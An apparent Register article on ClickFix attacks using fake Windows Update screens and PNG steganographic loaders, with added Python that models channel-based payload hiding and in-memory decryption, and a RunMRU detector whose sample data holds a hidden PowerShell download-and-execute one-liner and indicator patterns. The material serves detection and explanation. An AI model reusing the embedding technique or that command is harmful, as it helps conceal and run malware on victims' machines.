
"A fresh wave of ClickFix attacks is using fake Windows update screens to trick victims into downloading infostealer malware. ClickFix is a type of social engineering technique that tricks users into running malicious commands on their own machines, typically using fake fixes or I-am-not-a-robot prompts. These types of attacks have surged over the past year, with both government-sponsored spies and cybercriminal gangs deploying this technique to deliver malware. According to Microsoft, ClickFix is now the most common initial access method for attackers."
"Recent ClickFix attacks are moving away from the robot-check lures and instead using "highly convincing" phony Windows update screens, according to Huntress security analysts Ben Folland and Anna Pham. In another new twist, the malware slingers use a steganographic loader to deliver infostealing malware, including Rhadamanthys, by encoding malicious code directly into the pixel data of PNG images and then using specific color channels to reconstruct and decrypt the malware in memory. This technique also helps the malicious payloads to evade signature-based detection."
"These campaigns start with victims visiting a malicious website that causes their browsers to enter full-screen mode and display a blue Windows Update screen like this one shared on social media. If users fall for the scam, they're urged to install a "critical security update" via the typical ClickFix pattern: open the Run prompt (Win+R), then paste and run the malicious command."
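The steganographic loader described above does not read its second stage from a file: it reads it back out of the colour channels of an image and decrypts it in memory. The following Python is an added example written for this page, not code from Huntress, The Register or the campaign. Using only the standard library it builds a valid 8-bit RGB PNG, writes a length-prefixed, encrypted payload into one colour channel (blue by default), recovers and decrypts it from the image in memory the way a loader would, and adds a per-channel entropy check a defender can run on a suspect image. The cover image, the placeholder payload, the repeating-key XOR "cipher" and the channel layout are all assumptions; the report does not say which cipher or channel scheme the real loader uses.

```python
"""Toy model of a PNG colour-channel steganographic loader (added example)."""
import math
import struct
import zlib
from collections import Counter

PNG_SIG = b"\x89PNG\r\n\x1a\n"
CHANNEL = {"R": 0, "G": 1, "B": 2}


def _chunk(tag: bytes, body: bytes) -> bytes:
    """One PNG chunk: big-endian length, tag, body, CRC32 over tag+body."""
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)


def build_png(width: int, height: int, rgb: bytes) -> bytes:
    """Serialise raw RGB bytes (row-major, 3 bytes per pixel) as an 8-bit RGB PNG."""
    if len(rgb) != width * height * 3:
        raise ValueError("rgb buffer does not match width*height*3")
    stride = width * 3
    # Filter type 0 (None) on every scanline keeps the pixel bytes verbatim.
    raw = b"".join(b"\x00" + rgb[r * stride:(r + 1) * stride] for r in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def parse_png(data: bytes):
    """Return (width, height, rgb) for an 8-bit RGB PNG whose rows use filter type 0."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", None, None
    while pos + 8 <= len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if (depth, ctype) != (8, 2):
                raise ValueError("only 8-bit RGB is handled here")
        elif tag == b"IDAT":
            idat += body            # IDAT may be split across several chunks
        pos += 12 + length
    raw, stride, rgb = zlib.decompress(idat), width * 3, bytearray()
    for r in range(height):
        row = raw[r * (stride + 1):(r + 1) * (stride + 1)]
        if row[0] != 0:
            raise ValueError("unsupported scanline filter %d" % row[0])
        rgb += row[1:]
    return width, height, bytes(rgb)


def make_cover(width: int, height: int) -> bytes:
    """Constructed cover image: red/green gradients, flat blue (assumption, not a real lure image)."""
    return bytes(v for y in range(height) for x in range(width) for v in (x * 8 & 0xFF, y * 8 & 0xFF, 128))


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, a stand-in for whatever cipher the real loader uses (assumption)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def embed(rgb: bytes, blob: bytes, channel: str = "B") -> bytes:
    """Overwrite one colour channel of successive pixels with a length-prefixed blob."""
    c, out = CHANNEL[channel], bytearray(rgb)
    framed = struct.pack(">I", len(blob)) + blob
    if len(framed) > len(rgb) // 3:
        raise ValueError("cover image too small for payload")
    for i, b in enumerate(framed):
        out[i * 3 + c] = b
    return bytes(out)


def extract(rgb: bytes, channel: str = "B") -> bytes:
    """Read the channel back in pixel order and honour the 4-byte length prefix."""
    chan = rgb[CHANNEL[channel]::3]
    n = struct.unpack(">I", chan[:4])[0]
    return chan[4:4 + n]


def recover_payload(png: bytes, key: bytes, channel: str = "B") -> bytes:
    """Loader side: parse the image, pull the channel, decrypt; nothing is written to disk."""
    _, _, rgb = parse_png(png)
    return xor_stream(extract(rgb, channel), key)


def channel_entropy(rgb: bytes, channel: str = "B") -> float:
    """Shannon entropy (bits per byte) of one channel; encrypted data pushes it toward 8."""
    chan = rgb[CHANNEL[channel]::3]
    total = len(chan)
    return -sum(n / total * math.log2(n / total) for n in Counter(chan).values())


if __name__ == "__main__":
    cover = make_cover(32, 32)
    payload = b"stage-two placeholder bytes; constructed, not the campaign's payload"  # constructed
    key = b"example-key"                                                            # assumption
    png = build_png(32, 32, embed(cover, xor_stream(payload, key)))
    assert recover_payload(png, key) == payload
    print("blue-channel entropy: cover %.2f, stego %.2f"
          % (channel_entropy(cover), channel_entropy(parse_png(png)[2])))
```

The entropy check is only a heuristic: overwriting a whole channel of a small image with ciphertext stands out against a flat or smooth cover, but a payload spread across the low bits of a large photograph would barely move the number, so it complements rather than replaces looking at what process opened the image and what it did with the bytes afterwards.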
ClickFix is a social-engineering technique: a web page, in this campaign a full-screen browser window dressed up as a Windows Update screen, instructs the visitor to run a command, so the victim performs the initial execution themselves. Here the page tells them to open the Run prompt (Win+R) and paste a "critical security update" command, which starts a multi-stage chain. That chain uses a steganographic loader that carries malicious code in the pixel data of PNG images and reconstructs and decrypts the payload in memory from specific color channels; since the PNG looks like an ordinary image on disk and the code only materialises in memory, this helps the payload evade signature-based detection. The loaders deliver infostealers including Rhadamanthys. Defenders should watch for browser windows that go full-screen on update-themed pages, for interpreters such as PowerShell spawned by explorer.exe with a command line that was pasted into the Run dialog (those commands are also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), and for network connections to the indicators in the Huntress report.
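One concrete check for the Run-prompt activity mentioned above: every command a user submits through Win+R is stored under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, one value per command with a trailing "\1", and the MRUList value records their order, most recent first. The Python below is an added example, not tooling from Huntress or The Register: it reads that key on a Windows host (or accepts an exported dict anywhere else), restores recency order and scores each command against indicator patterns typical of ClickFix paste-and-run one-liners. The sample RunMRU values, the indicator list and its weights, the threshold and the TEST-NET address 203.0.113.10 are constructed for illustration and do not come from the report.

```python
"""Score Run-dialog history (RunMRU) for ClickFix-style one-liners (added example)."""
import re

RUNMRU_SUBKEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Indicator patterns typical of ClickFix lures. Weights are this example's own
# choice, not a published scoring scheme.
INDICATORS = [
    (r"\bpowershell(\.exe)?\b.*\s-(w|win|windowstyle)\s*hidden", 2, "hidden PowerShell window"),
    (r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s", 3, "encoded PowerShell command"),
    (r"\bmshta(\.exe)?\b", 3, "mshta launcher"),
    (r"https?://", 1, "contains a URL"),
    (r"\b(iex|invoke-expression)\b", 3, "feeds content to Invoke-Expression"),
    (r"\b(curl|wget|irm|iwr|invoke-webrequest|invoke-restmethod)\b", 1, "downloader"),
    (r"#\s*.*\b(verif\w*|captcha|robot|update)\b", 2, "human-facing comment tail"),
]
COMPILED = [(re.compile(p, re.I), w, why) for p, w, why in INDICATORS]

# Constructed sample of what winreg returns: values carry the trailing "\1"
# Windows appends, and MRUList names the entries most-recent first.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": 'powershell -w hidden -c "irm https://203.0.113.10/update | iex" # Windows Update\\1',
    "MRUList": "cba",
}


def read_runmru_live() -> dict:
    """Read the current user's RunMRU values on Windows; returns {} elsewhere or if absent."""
    try:
        import winreg
    except ImportError:
        return {}
    try:
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_SUBKEY)
    except OSError:
        return {}
    values = {}
    with key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:          # no more values
                break
            values[name] = data
            index += 1
    return values


def strip_marker(value: str) -> str:
    """Drop the literal backslash-1 that Windows appends to each RunMRU entry."""
    return value[:-2] if value.endswith("\\1") else value


def ordered_commands(values: dict) -> list:
    """(name, command) pairs, most recent first, following MRUList."""
    order = list(values.get("MRUList", ""))
    order += sorted(n for n in values if n != "MRUList" and n not in order)
    return [(n, strip_marker(values[n])) for n in order if n in values]


def score_command(command: str):
    """Return (score, reasons) for one command line."""
    score, reasons = 0, []
    for rx, weight, why in COMPILED:
        if rx.search(command):
            score += weight
            reasons.append(why)
    return score, reasons


def assess_runmru(values: dict) -> list:
    """Score every entry; returns (name, command, score, reasons) in recency order."""
    return [(n, cmd) + score_command(cmd) for n, cmd in ordered_commands(values)]


def flag_runmru(values: dict, threshold: int = 3) -> list:
    """Entries at or above the threshold, the ones worth an analyst's look."""
    return [row for row in assess_runmru(values) if row[2] >= threshold]


if __name__ == "__main__":
    for name, cmd, score, reasons in flag_runmru(read_runmru_live() or SAMPLE_RUNMRU):
        print("%s score=%d (%s)\n    %s" % (name, score, ", ".join(reasons), cmd))
```

RunMRU only survives until the user clears it and only captures what went through the Run dialog, so treat a hit as a starting point: pivot to process-creation telemetry for the explorer.exe child it spawned and to the network connections that child made.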
Read at The Register